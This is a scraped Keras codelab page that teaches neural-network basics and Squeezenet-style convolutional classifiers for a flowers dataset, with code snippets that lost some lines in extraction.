classes\n])\n\n# this configures the training of the model. Keras calls it \"compiling\" the model.\nmodel.compile(\nloss= 'categorical_crossentropy',\nmetrics=['accuracy']) # % of correct answers\n\n# train the model\nmodel.fit(dataset, ... )``````", null, "## Dense neural network\n\nThis is the simplest neural network for classifying images. It is made of \"neurons\" arranged in layers. The first layer processes input data and feeds its outputs into other layers. It is called \"dense\" because each neuron is connected to all the neurons in the previous layer.", null, "You can feed an image into such a network by flattening the RGB values of all of its pixels into a long vector and using it as inputs. It is not the best technique for image recognition but we will improve on it later.\n\n## Neurons, activations, RELU\n\nA \"neuron\" computes a weighted sum of all of its inputs, adds a value called \"bias\" and feeds the result through a so called \"activation function\". The weights and bias are unknown at first. They will be initialized at random and \"learned\" by training the neural network on lots of known data.", null, "The most popular activation function is called RELU for Rectified Linear Unit. It is a very simple function as you can see on the graph above.\n\n## Softmax activation\n\nThe network above ends with a 5-neuron layer because we are classifying flowers into 5 categories (rose, tulip, dandelion, daisy, sunflower). Neurons in intermediate layers are activated using the classic RELU activation function. In the last layer though, we want to compute numbers between 0 and 1 representing the probability of this flower being a rose, a tulip and so on. For this, we will use an activation function called \"softmax\".\n\nApplying softmax on a vector is done by taking the exponential of each element and then normalising the vector, typically using the L1 norm (sum of absolute values) so that the values add up to 1 and can be interpreted as probabilities.", null, "", null, "## Cross-entropy loss\n\nNow that our neural network produces predictions from input images, we need to measure how good they are, i.e. the distance between what the network tells us and the correct answers, often called \"labels\". Remember that we have correct labels for all the images in the dataset.\n\nAny distance would work, but for classification problems the so-called \"cross-entropy distance\" is the most effective. We will call this our error or \"loss\" function:", null, "\"Training\" the neural network actually means using training images and labels to adjust weights and biases so as to minimise the cross-entropy loss function. Here is how it works.\n\nThe cross-entropy is a function of weights, biases, pixels of the training image and its known class.\n\nIf we compute the partial derivatives of the cross-entropy relatively to all the weights and all the biases we obtain a \"gradient\", computed for a given image, label, and present value of weights and biases. Remember that we can have millions of weights and biases so computing the gradient sounds like a lot of work. Fortunately, Tensorflow does it for us. The mathematical property of a gradient is that it points \"up\". Since we want to go where the cross-entropy is low, we go in the opposite direction. We update weights and biases by a fraction of the gradient. We then do the same thing again and again using the next batches of training images and labels, in a training loop. Hopefully, this converges to a place where the cross-entropy is minimal although nothing guarantees that this minimum is unique.", null, "## Mini-batching and momentum\n\nYou can compute your gradient on just one example image and update the weights and biases immediately, but doing so on a batch of, for example, 128 images gives a gradient that better represents the constraints imposed by different example images and is therefore likely to converge towards the solution faster. The size of the mini-batch is an adjustable parameter.\n\nThis technique, sometimes called \"stochastic gradient descent\" has another, more pragmatic benefit: working with batches also means working with larger matrices and these are usually easier to optimise on GPUs and TPUs.\n\nThe convergence can still be a little chaotic though and it can even stop if the gradient vector is all zeros. Does that mean that we have found a minimum? Not always. A gradient component can be zero on a minimum or a maximum. With a gradient vector with millions of elements, if they are all zeros, the probability that every zero corresponds to a minimum and none of them to a maximum point is pretty small. In a space of many dimensions, saddle points are pretty common and we do not want to stop at them.", null, "Illustration: a saddle point. The gradient is 0 but it is not a minimum in all directions. (Image attribution Wikimedia: By Nicoguaro - Own work, CC BY 3.0)\n\nThe solution is to add some momentum to the optimization algorithm so that it can sail past saddle points without stopping.\n\n## Glossary\n\nbatch or mini-batch: training is always performed on batches of training data and labels. Doing so helps the algorithm converge. The \"batch\" dimension is typically the first dimension of data tensors. For example a tensor of shape [100, 192, 192, 3] contains 100 images of 192x192 pixels with three values per pixel (RGB).\n\ncross-entropy loss: a special loss function often used in classifiers.\n\ndense layer: a layer of neurons where each neuron is connected to all the neurons in the previous layer.\n\nfeatures: the inputs of a neural network are sometimes called \"features\". The art of figuring out which parts of a dataset (or combinations of parts) to feed into a neural network to get good predictions is called \"feature engineering\".\n\nlabels: another name for \"classes\" or correct answers in a supervised classification problem\n\nlearning rate: fraction of the gradient by which weights and biases are updated at each iteration of the training loop.\n\nlogits: the outputs of a layer of neurons before the activation function is applied are called \"logits\". The term comes from the \"logistic function\" a.k.a. the \"sigmoid function\" which used to be the most popular activation function. \"Neuron outputs before logistic function\" was shortened to \"logits\".\n\nloss: the error function comparing neural network outputs to the correct answers\n\nneuron: computes the weighted sum of its inputs, adds a bias and feeds the result through an activation function.\n\none-hot encoding: class 3 out of 5 is encoded as a vector of 5 elements, all zeros except the 3rd one which is 1.\n\nrelu: rectified linear unit. A popular activation function for neurons.\n\nsigmoid: another activation function that used to be popular and is still useful in special cases.\n\nsoftmax: a special activation function that acts on a vector, increases the difference between the largest component and all others, and also normalizes the vector to have a sum of 1 so that it can be interpreted as a vector of probabilities. Used as the last step in classifiers.\n\ntensor: A \"tensor\" is like a matrix but with an arbitrary number of dimensions. A 1-dimensional tensor is a vector. A 2-dimensions tensor is a matrix. And then you can have tensors with 3, 4, 5 or more dimensions.\n\n## In a nutshell\n\nIf all the terms in bold in the next paragraph are already known to you you can move to the next exercise. If your are just starting with convolutional neural networks please read on.", null, "Illustration: filtering an image with two successive filters made of 4x4x3=48 learnable weights each.\n\nThis is how a simple convolutional neural network looks in Keras:\n\n``````model = tf.keras.Sequential([\n# input: images of size 192x192x3 pixels (the three stands for RGB channels)\ntf.keras.layers.Conv2D(kernel_size=3, filters=24, padding='same', activation='relu', input_shape=[192, 192, 3]),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.Flatten(),\n# classifying into 5 categories\ntf.keras.layers.Dense(5, activation='softmax')\n])\n\nmodel.compile(\nloss= 'categorical_crossentropy',\nmetrics=['accuracy'])``````", null, "## Convolutional neural nets 101\n\nIn a layer of a convolutional network, one \"neuron\" does a weighted sum of the pixels just above it, across a small region of the image only. It adds a bias and feeds the sum through an activation function, just as a neuron in a regular dense layer would. This operation is then repeated across the entire image using the same weights. Remember that in dense layers, each neuron had its own weights. Here, a single \"patch\" of weights slides across the image in both directions (a \"convolution\"). The output has as many values as there are pixels in the image (some padding is necessary at the edges though). It is a filtering operation, using a filter of 4x4x3=48 weights.\n\nHowever, 48 weights will not be enough. To add more degrees of freedom, we repeat the same operation with a new set of weights. This produces a new set of filter outputs. Let's call it a \"channel\" of outputs by analogy with the R,G,B channels in the input image.", null, "The two (or more) sets of weights can be summed up as one tensor by adding a new dimension. This gives us the generic shape of the weights tensor for a convolutional layer. Since the number of input and output channels are parameters, we can start stacking and chaining convolutional layers.", null, "Illustration: a convolutional neural network transforms \"cubes\" of data into other \"cubes\" of data.\n\n## Strided convolutions, max pooling\n\nBy performing the convolutions with a stride of 2 or 3, we can also shrink the resulting data cube in its horizontal dimensions. There are two common ways of doing this:\n\n• Strided convolution: a sliding filter as above but with a stride >1\n• Max pooling: a sliding window applying the MAX operation (typically on 2x2 patches, repeated every 2 pixels)", null, "Illustration: sliding the computing window by 3 pixels results in fewer output values. Strided convolutions or max pooling (max on a 2x2 window sliding by a stride of 2) are a way of shrinking the data cube in the horizontal dimensions.\n\n## Convolutional classifier\n\nFinally, we attach a classification head by flattening the last data cube and feeding it through a dense, softmax-activated layer. A typical convolutional classifier can look like this:", null, "Illustration: an image classifier using convolutional and softmax layers. It uses 3x3 and 1x1 filters. The maxpool layers take the max of groups of 2x2 data points. The classification head is implemented with a dense layer with softmax activation.\n\n## In Keras\n\nThe convolutional stack illustrated above can be written in Keras like this:\n\n``````model = tf.keras.Sequential([\n# input: images of size 192x192x3 pixels (the three stands for RGB channels)\ntf.keras.layers.Conv2D(kernel_size=3, filters=32, padding='same', activation='relu', input_shape=[192, 192, 3]),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.Flatten(),\n# classifying into 5 categories\ntf.keras.layers.Dense(5, activation='softmax')\n])\n\nmodel.compile(\nloss= 'categorical_crossentropy',\nmetrics=['accuracy'])``````\n\nThe padding parameter in convolutional layers can have two values:\n\n• \"same\": pad with zeros so as to produce outputs of the same width/height as the input\n• \"valid\": no padding, only use real pixels\n\n## In a nutshell", null, "Illustration: a convolutional \"module\". What is best at this point ? A max-pool layer followed by a 1x1 convolutional layer or a different combination of layers ? Try them all, concatenate the results and let the network decide. On the right: the \"inception\" convolutional architecture using such modules.\n\nIn Keras, to create models models where the data flow can branch in and out, you have to use the \"functional\" model style. Here is an example:\n\n``````l = tf.keras.layers # syntax shortcut\n\nactivation='relu', input_shape=[192, 192, 3])(x) # x=input image\n\n# module start: branch out\ny1 = l.Conv2D(filters=32, kernel_size=1, padding='same', activation='relu')(y)\ny3 = l.Conv2D(filters=32, kernel_size=3, padding='same', activation='relu')(y)\ny = l.concatenate([y1, y3]) # output now has 64 channels\n# module end: concatenation\n\n# many more layers ...\n\n# Create the model by specifying the input and output tensors.\n# Keras layers track their connections automatically so that's all that's needed.\nz = l.Dense(5, activation='softmax')(y)\nmodel = tf.keras.Model(x, z)``````", null, "## Other cheap tricks\n\n### Small 3x3 filters", null, "In this illustration, you see the result of two consecutive 3x3 filters. Try to trace back which data points contributed to the result: these two consecutive 3x3 filters compute some combination of a 5x5 region. It is not exactly the same combination that a 5x5 filter would compute but it is worth trying because two consecutive 3x3 filters are cheaper than a single 5x5 filter.\n\n### 1x1 convolutions ?", null, "In mathematical terms, a \"1x1\" convolution is a multiplication by a constant, not a very useful concept. In convolutional neural networks however, remember that the filter is applied to a data cube, not just a 2D image. Therefore, a \"1x1\" filter computes a weighted sum of a 1x1 column of data (see illustration) and as you slide it across the data, you will obtain a linear combination of the channels of the input. This is actually useful. If you think of the channels as the results of individual filtering operations, for example a filter for \"pointy ears\", another one for \"whiskers\" and a third one for \"slit eyes\" then a \"1x1\" convolutional layer will be computing multiple possible linear combinations of these features, which might be useful when looking for a \"cat\". On top of that, 1x1 layers use fewer weights.\n\nA simple way of putting these ideas together has been showcased in the \"Squeezenet\" paper. The authors suggest a very simple convolutional module design, using only 1x1 and 3x3 convolutional layers.", null, "Illustration: squeezenet architecture based on \"fire modules\". They alternate a 1x1 layer that \"squeezes\" the incoming data in the vertical dimension followed by two parallel 1x1 and 3x3 convolutional layers that \"expand\" the depth of the data again.\n\nContinue in your previous notebook and build a squeezenet-inspired convolutional neural network. You will have to change the model code to the Keras \"functional style\".\n\nHANDS-ON:", null, "`Keras_Flowers_TPU (playground).ipynb`\n\n## Squeezenet architectures to try\n\nIt will be useful for this exercise to define a helper function for a squeezenet module:\n\n``````def fire(x, squeeze, expand):\ny = l.Conv2D(filters=squeeze, kernel_size=1, padding='same', activation='relu')(x)\ny1 = l.Conv2D(filters=expand//2, kernel_size=1, padding='same', activation='relu')(y)\ny3 = l.Conv2D(filters=expand//2, kernel_size=3, padding='same', activation='relu')(y)\nreturn tf.keras.layers.concatenate([y1, y3])\n\n# this is to make it behave similarly to other Keras layers\ndef fire_module(squeeze, expand):\nreturn lambda x: fire(x, squeeze, expand)\n\n# usage:\nx = l.Input(shape=[192, 192, 3])\ny = fire_module(squeeze=24, expand=48)(x) # typically, squeeze is less than expand\ny = fire_module(squeeze=32, expand=64)(y)\n...\nmodel = tf.keras.Model(x, y)\n``````\n\nHere are a couple of architectures you can try:\n\n### Little squeeze: 6 layers, global average pooling\n\n``````x = l.Input(shape=[*IMAGE_SIZE, 3])\n\n# Squeezenet's fire modules alternating with max-pooling layers\ny = fire_module(squeeze=25, expand=50)(x)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=25, expand=50)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=25, expand=50)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# classification head with cheap global average pooling to 50 numbers\n# (each channel is averaged to one number), followed by dense softmax layer.\ny = l.GlobalAveragePooling2D()(y)\ny = l.Dense(5, activation='softmax')(y)``````\n\nThis one is simple but not so great, tops out at 65% accuracy.\n\n### Squeeze-dense: 8 layers, dense classification head\n\n``````x = l.Input(shape=[*IMAGE_SIZE, 3])\n\n# Starting directly with a 3x3 layer instead of the 1x1 layer that starts a fire\n# module. Not sure if doing a 1x1 convolution (=linear combination) of the RGB\n# channels of the input image is useful.\ny = l.Conv2D(kernel_size=3, filters=40, padding='same', activation='relu')(x)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# Alternating max-pooling and fire modules with increasing filter count.\ny = fire_module(squeeze=25, expand=50)(x)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=30, expand=60)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=40, expand=80)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# final 1x1 conv layer to bring the channel count to a reasonable 10 channels\ny = l.Conv2D(kernel_size=1, filters=10, padding='same', activation='relu')(y)\n\n# flatten 24x24x10 data cube to 24x24x10=5760 long vector and end on a fairly large\n# dense layer. Notice that it accounts for half of the weights of the entire network.\ny = l.Flatten()(y)\ny = l.Dense(5, activation='softmax')(y)``````\n\nThis one goes to 75% accuracy. For the flowers dataset, a final dense layer seems to be working better than global average pooling.\n\n### Squeeze it as fast as you can: quick downsampling, 6 layers, global average pooling\n\n``````x = l.Input(shape=[*IMAGE_SIZE, 3])\n\n# Are all the 192x192 pixels of the image useful for recognizing flowers ?\n# Let's downsample heavily with a 6x6 filter applied every 2 pixels (output is 96x96)\n# and a max-pooling layer right after (output is now 48x48).\ny = l.Conv2D(kernel_size=6, filters=42, padding='same', activation='relu', strides=2)(x)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# only 4 layers worth of fire modules, let's see if it is enough\ny = fire_module(squeeze=24, expand=60)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=27, expand=90)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# Global average pooling by the book: one last conv layer to bring the number of\n# channels down to 5, average them, apply softmax activation on the results directly.\n# No dense layer at all.\ny = l.Conv2D(kernel_size=1, filters=5, padding='same', activation='relu')(y)\ny = l.GlobalAveragePooling2D()(y)\ny = l.Activation('softmax')(y)``````\n\nThis model trains in 3 seconds per epoch on TPU and amazingly, it still achieves 70% accuracy. Downsampling the input image aggressively seems to work for the flowers dataset.\n\n### Squeeze it to 90%\n\nThe convnet from the previous chapter achieved 75% accuracy and transfer learning from the first chapter took us to 85% accuracy. Can you beat them ?\n\nSometimes, you will see training curves like this:", null, "The validation accuracy stalls and the validation loss goes up instead of going down. This is usually called \"overfitting\". It happens when the optimization work that is being done on the training dataset is no longer useful for examples outside of the training dataset. Various regularization techniques such as \"dropout\" or \"batch normalization\" can be used to address this, but this is a topic for another code lab. For now, just restart the training. On the Flowers dataset, the random weights initializations are sufficient to get the network to converge on most runs.\n\n## Solution\n\nHere is the solution notebook. You can use it if you are stuck.", null, "`Keras_Flowers_TPU_squeezenet.ipynb`\n\n## What we've covered\n\n• 🤔 Keras \"functional style\" models\n• 🤓 Squeezenet architecture", null, "", null, "The author: Martin GörnerTwitter: @martin_gorner", null, "www.tensorflow.org" ]
[ null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/3ac215b2fdd20e74.png", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/983220a6ead98ce0.png", null, "https://lh4.googleusercontent.com/y9StiIb4MI8CdALd5uUb_hmmii_v1IbYoq-djHkVTByQqTDWfTMi4YN1STs_vswejMHkefgv8wV7E1IjQGZe5iG85InU_J6_BKOEwOj2S9nwYSrop2fHcZm0wPMyrabGN6gPz0LL", null, "https://lh5.googleusercontent.com/EZ0ENVv_luEK_Ihc9XfCkxD-FkWGfcdreuw7j9RDSXObnhlo0Nf15RVtm-4xwIlxfeYO7QxJojU3yvCJHmY0ZIi_YvJxA1U7b2nGfubo6mQPw97dICc8pRouXBz_K9QcHqMvtkAk", null, "https://lh6.googleusercontent.com/SOJ1AG1XNIW-ToNfd6arlYkT-O_oAJRXv1X0AjKl39gfNvDWgIwOCWPMykhx4RtEv7HL8Qt1rVNVnAgsx0sXR7FzGEriweqmLvWf85a-DBoFweQh-QjVLyUosqFBpGqTwZsn0unV", null, "https://lh6.googleusercontent.com/HhbGLjAVVLr_VaFrRa1Duwm1SteFlUW-gcMf4klTKWHdX1I2lBcq1d4ONt5REgPf5O5WQVlsgp1U9mmtG-4_r0NIS_PPRtW2Ngh_l3kQNz4TXnmB3vyfHmWPH7eFhgIGqjvdzl9x", null, "https://lh4.googleusercontent.com/rOVEL6wVS-Jkf3UL7bPavN1l8EPXhjbL3ffQuPvv9eLVpgcTIOlwZXKpEfbNq6q3XeZRAu8wT7G68zOQ1OcP3cDYhHUiacISDMxIc-Zkfjqc_6l5iUiAQoktI9oWInLvUHa-Kbuo", null, "https://lh3.googleusercontent.com/z4mnVe-RfMZgmip6ZzgU3ZjW2F5vcGwurz_dKH2SX8bZfC_Fyk5nQbsCLas2RRb1KvjQ_pURNnIl8YSl8mw3kCFADNA4-Vy-p56srObiEIWjECMEqkecu0gtWwJGgxckY-w_SWEe", null, "https://lh6.googleusercontent.com/eEfP0uj73Ln5e4veygi7m8x4IZCgf8oA6RUgndb0qdLnw1gnAynBkgzLUzXJtRdNLeiyoNLZ2hm9eAbcyxAENxGKzvfNKzoETHbYywf0I3VEHrfJRK3RZZhpY1KDfaaF9eMw5c2l", null, "https://lh3.googleusercontent.com/4xp5DSK_pndOc5oCy8npFaKOK5w7k8W1Cq0g-DEjeHzGQIkqLIxoNLJzHyx1oi5ST2VzGz1m8SB55Qm7Dd76y2eB-R57GRWtUoA2tMx7n19mALxUjV5MA6R9jl-0WQpC7aMuEU36", null, "https://lh6.googleusercontent.com/m2ZNXsswkirhjtpUulhu9Xr8DTAXMSmlEziRrNQTuiqx4HsTDEsRplaC4aioZq7jiRHJFLI_zKMFTZCnGLvkNFxuF5F7iRrEq-YE9hHbObquQMAp56VYOnYs3K0Lat8zY9ZUfG00", null, "https://lh6.googleusercontent.com/CCeZnBe_Z3DfWBk0XX3jsGiix4uSk68AH6GGypFnm-xFjyYsE8bI1y8XhV2bD9VbRFTrIUu66vK57wjMk6KjT6hq41F1LaP8ZvTJDTelB0XjCcvbdvqitbnz8ZKwu2yK7IeWaER-", null, "https://lh5.googleusercontent.com/qerSwSYAQI7Pu_M8JTYdeoalmjU8HjZjLlQ5Lsj3fLpgQkD_2HGSLxs_xkyNm05GCn0djs0nFrVuNFlmZOien7VYNASYT6eWhVxJ-Kj829_hFwrDy6I3V0KamEs1vi8Xvdl0dmxL", null, "https://lh6.googleusercontent.com/5jb9KLw4SN9slhBZJ7Rki8-jShUKw44BwvH5EiCO58-H0oRbgOP7yewRk7VqEGtqHRXWgyP0vNYSmEnKdydcBjscCVgQK11zTgkt-mgXJuocx0LvV8hY23XbP0nDQ0hcfTSUc7Ur", null, "https://lh5.googleusercontent.com/8hqB2Vz99LdF8jZI_SohPDQECcW-npuhPbQfv97Pk5pN-dmN990W6QOHSZyCc6tQzfIEv5FFj6s6paNjMxa4AIoe2iaRt3ctJtW3P8noSV0rhG_8kRGsnnYcQJxB_wQxh7DUXu-S", null, "https://lh6.googleusercontent.com/NL87v6IA4pJi_3THTrupqCkzMCdQIxPXPVkDw1HtXWBF0u_nl0cSpxBk_acuT7E142UaQWIJ4V18pB7OllBt_km61Rk6aTyvbRcsSjciluC2bNZF5ROzWjKAeu187q4Vq0Wq4Agm", null, "https://lh5.googleusercontent.com/NjGqp60oF_3Bu4Q63dprSivZ77BgVnaPEp0Olk1moFm8okcmMfPXs7PIJBgL9LB5QCtqlmM4WTepYxPC5Mq_i_0949sWSpq8pKvfPAkHnFJWuHjrNVLPN2_a0eggOlteV7mZB_Z9", null, "https://lh5.googleusercontent.com/KD6_bklEMVbMIqlWWqATuQt_IjmlR3oxvM-EJsRwWAevvjAI9BiHQ8jkK9cYkV03uXek_6zBzk6fmKC4N2JLzB270SnaX61rDBVXK-nLP4n39LP3N9B_GuuxYJ8RQJCj9OwdhDaf", null, "https://lh5.googleusercontent.com/KD6_bklEMVbMIqlWWqATuQt_IjmlR3oxvM-EJsRwWAevvjAI9BiHQ8jkK9cYkV03uXek_6zBzk6fmKC4N2JLzB270SnaX61rDBVXK-nLP4n39LP3N9B_GuuxYJ8RQJCj9OwdhDaf", null, "https://lh3.googleusercontent.com/VoZ48TJbsPyLLgLPnWfuDbPaxMzj4YI0QCHwu8d3V8GofTOaiqF9EhrA5YN7YefBMT8FaksSSudcpkMKSYqDAD5BRNC3yCFTlN1A3KadhH_wvxULBm6G-LAwX3Lf_6wsgDl8Pjs-", null, "https://lh6.googleusercontent.com/eZH8QIod6Ox7rXZHxuFdn8sO1xKwvQijFhbvDJvA3IInuHoLns_jhSnu3IC7Z_zun4hoY0sc7qMtRoo0QoHuvV3b34HmAisP44O2isb0MjXA2G7KcDJAM6zbpsDyiwESvtq33rsw", null, "https://lh5.googleusercontent.com/k6DjuuSf7jENzT5JAisVayQhJCARHalDhKF2fbn4rz2dzC812YuVELqrjEm0ikptxbEY0f9SbjPQibWIBl19xytf-tyE2jKCIrS6Fd2DppNOMOr7sdxivPdX30RRGMaznOy__j84", null, "https://lh4.googleusercontent.com/pKXcGQkdrtOv6Tt3xd9mKdiFMjsBgYl4yJxY1OhKbYeyezyl0OVJqzUkNlzCnhECvT573vlgp4tv6yK0SN24B8NisJx_09eiudk4cY9TsXexvYhz3CPYbm4Luwe7IYkl99nOKZ-X", null, "https://lh6.googleusercontent.com/R9PjsenJH05ZPQ5avjtotPRlEygOMzI-DYQ_w_0iJxZINMOPgDSqZyhTPjI4CoccAUVOTy48xWL-KqRKgy70RA1CQszQCji340OANsQXKmzKKEV2k3Aqzideb45L11MZ4GQnwIBo", null, "https://lh5.googleusercontent.com/lHJ39zJS_bxIUex466f5B0y9KLrfLYsvO3AE4SePRonU9Iu9xzgrUHaSUwiwt2jo7DZNPcZ8KiDz1wdgPKcLWfqSPm4SqpoGXqsCUrQnaKj3kYtWB7rRHoj0HumhIu5vyqzZMUdu", null, "https://lh6.googleusercontent.com/-zJknBe86qyBthLnAR2MvG8gJ16VNFpq48Fxyj1wKEcPsbovQltacyg929AjZp0ar_bbgQvuQ9dj_wMNlowlJENXFATDfYOVS7QikA_i9ZAbHqFgVDYggV7dLCdzTPfMD1xi5fk3", null, "https://lh4.googleusercontent.com/pca1hdZW4x0-ATiV-pOqIthBB3Iev7hL8A_FTD7GPuziWKT75U0SvmXBz8D9iO1t0WqRH9QKZwoVjYIvHm-mNns0W8oT1w4F-M6_zdkAIj6OC7JDLqMmfu9Sj0KNSkPkDndzndnl", null, "https://lh4.googleusercontent.com/YLAIo_FvooqiS6OIJtlhwVbGR33PbTRXMykYADYz_zXlCutsn6znaAuDuIC5FXgUodCiP_SmI9o0k2qJTdheVxiO7hhK9Y2kjCAg7j4r1-lhb0ALGGiZq4gvivViz5k7HtCFITVI", null, "https://lh4.googleusercontent.com/d2ajiE5vZEKGbJYpWCopx22A5c5ZfzCnYz5JhMl0KZeXDQEV1V-fQCHawm05A6IdeMuzTaoYt9NlSy1gRApwKM0jALTqsvGcn4w2zl-WOMdNfNApvuefO7W3O9HUukxQZq81e8PZ", null, "https://lh3.googleusercontent.com/fbiSOeGYh--XzS4WAualpWoeq781TQ-FennJaJEoq5yTi0TK2jElTUpARFhoN7H3bYrUEa7SiLQOARwqZmRa52xxqpJaaD4eXOyU0n5vDgLOc-Zhrx_XCckr1IoUsaMWGN-fmKJ2", null, "https://lh5.googleusercontent.com/-ixE46DvIXGNT5dntsb1X-GLJXNoQtW_tG4UFvE55VLoWQZLBrjKLsrl4a9TeBJLTGbmYS1QaApCV0ArpL6RzXlFKMso3kWdPu7NTyCPjRqBVmX8SbB4M7QvdLuqk_ImlSTU7j_m", null, "https://lh4.googleusercontent.com/VmGHD8fRcDXvPe1HKjfyJ6YAPyIoLUh_871vA-6iDno6VYYPR1EIwwu-ABOjeX5c8kmJ270eMwPAEyQUsnUnQu1cV5Dmfk-DLcSdMx-OlafsYLYSgh7bxAmRas9Md-I2xJ3HI6B0", null, "https://lh3.googleusercontent.com/NzA0J8O-oxh7qrzlRWqp5eMgiph-5P-lTRY112j5VhbQAfYlkV3hBDQ69q7Lxh9u5-3TIdt3usoPTSodLCahIBZ4N2AfDDlF53xHvpOIj3sLzpKRRZNe7H9IuI4eQEsC_mZ9KFwQ", null, "https://lh5.googleusercontent.com/m4eFxPbgMArZoVEwh2m5RtX_zTYwRIJbD9URa_MmMPjBjBuWs8JZ2BHniiPMtKeFq9ohIHAAEo0U270BHOvcR-p9hIIw6cNV4N8fjMd9fuFrqKU3IPb0khvu0G4vOYgaARWhA0pX", null, "https://lh4.googleusercontent.com/LTqGr50OxM34tUiCE5JjznbW4UQMK6DDTPt-hrL3CxLQcNNMYbT2s0I-zgS18wXmn4CJg7yUQSJPeo0i3ZEECx0Tq8S3_C84grWI45aIYezj4CITEGznRKTxuipaHbqC227dNw_n", null, "https://lh6.googleusercontent.com/NYXqkOPmrcBctoxUhx01G7eOEqaIZBXmyW5CM9bxIRZMcpuVlELCG6EvhUO6v3tm_WNInGdbAuJkpJnTy3kuJgqgYMlOohktK-MChzNXbaz4RkEdaVACvRpGKCYhXtWCjJMgt5_E", null, "https://lh4.googleusercontent.com/BtT56u3wVLqY1yNzcNHLOIBSd_GUNBkLJ69efmCwhN3xFPLujGmBqN4DMvCTTjF6o7SDkubHmVRmPnZUCfGTZz7i7dW8R5FGQ1ugKxk_8u0llxBsHgB2c1oX2mqI89bxCmlNwlVr", null, "https://lh4.googleusercontent.com/EY1NLuqJtrOyg5_wp4WGQl6iGwmJJVopA0IlZKgd3MewuCL65uHwBNNR7Ao91aX6x7jSdnRQj4HV3TEeKFsFvbEGrpJfhZ74y_oVlBGobM5h_XGyYtCyv0nfojXsZiKlOvSAibuC", null, "https://lh5.googleusercontent.com/aj0RnLWPpPRMHErHeNmkkgnWpD9Vbx5p5LTvax3EQgyY9bYPrtx1PtwTruxilhCRPndQFUoqmNvAMBIHktEyEWWFUwaiQj3FU-UOp8GX2blY3BMNd8JDMtQBy_Hzwr2orXszRzOF", null, "https://lh5.googleusercontent.com/3GTJ7pqO4bnJpNralGYL3gx5tVvMng8hF548Rxw5pF6E-DS7NTHqYeUIYXL_fvknrY2ckroJp7G_hOSXdppDtuTVod6FxRccWbqspW8vwv1SUEl6o7fmPEf4gEPffn6rfBVVxrpJ", null, "https://lh5.googleusercontent.com/aj0RnLWPpPRMHErHeNmkkgnWpD9Vbx5p5LTvax3EQgyY9bYPrtx1PtwTruxilhCRPndQFUoqmNvAMBIHktEyEWWFUwaiQj3FU-UOp8GX2blY3BMNd8JDMtQBy_Hzwr2orXszRzOF", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/4c2925956f9292.png", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/1dd39cb813f337e2.jpeg", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/2863687467111708.jpeg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8493215,"math_prob":0.88909495,"size":31319,"snap":"2019-26-2019-30","text_gpt3_token_len":7242,"char_repetition_ratio":0.12684017,"word_repetition_ratio":0.048842642,"special_character_ratio":0.22756155,"punctuation_ratio":0.1338503,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98967016,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88],"im_url_duplicate_count":[null,1,null,1,null,9,null,9,null,6,null,9,null,9,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,4,null,5,null,8,null,8,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,3,null,3,null,3,null,3,null,3,null,3,null,2,null,2,null,2,null,2,null,2,null,4,null,2,null,4,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-18T11:37:02Z\",\"WARC-Record-ID\":\"<urn:uuid:537eba92-2900-4064-af1a-2224034b4680>\",\"Content-Length\":\"61700\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bd709e61-2d4e-4c1e-af63-ee54343c56af>\",\"WARC-Concurrent-To\":\"<urn:uuid:db937fd6-8a76-4a93-880d-b7c37982e88b>\",\"WARC-IP-Address\":\"172.217.164.174\",\"WARC-Target-URI\":\"https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/index.html?index=..%2F..index\",\"WARC-Payload-Digest\":\"sha1:ONUE5ACJKJAE2LZOLNVEY6CSR6SNPFLH\",\"WARC-Block-Digest\":\"sha1:UQTPQBLP5B34YV56TALEW3JB232H6I25\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195525627.38_warc_CC-MAIN-20190718104512-20190718130512-00531.warc.gz\"}"}
https://nl.mathworks.com/matlabcentral/cody/problems/151-magic/solutions/11823
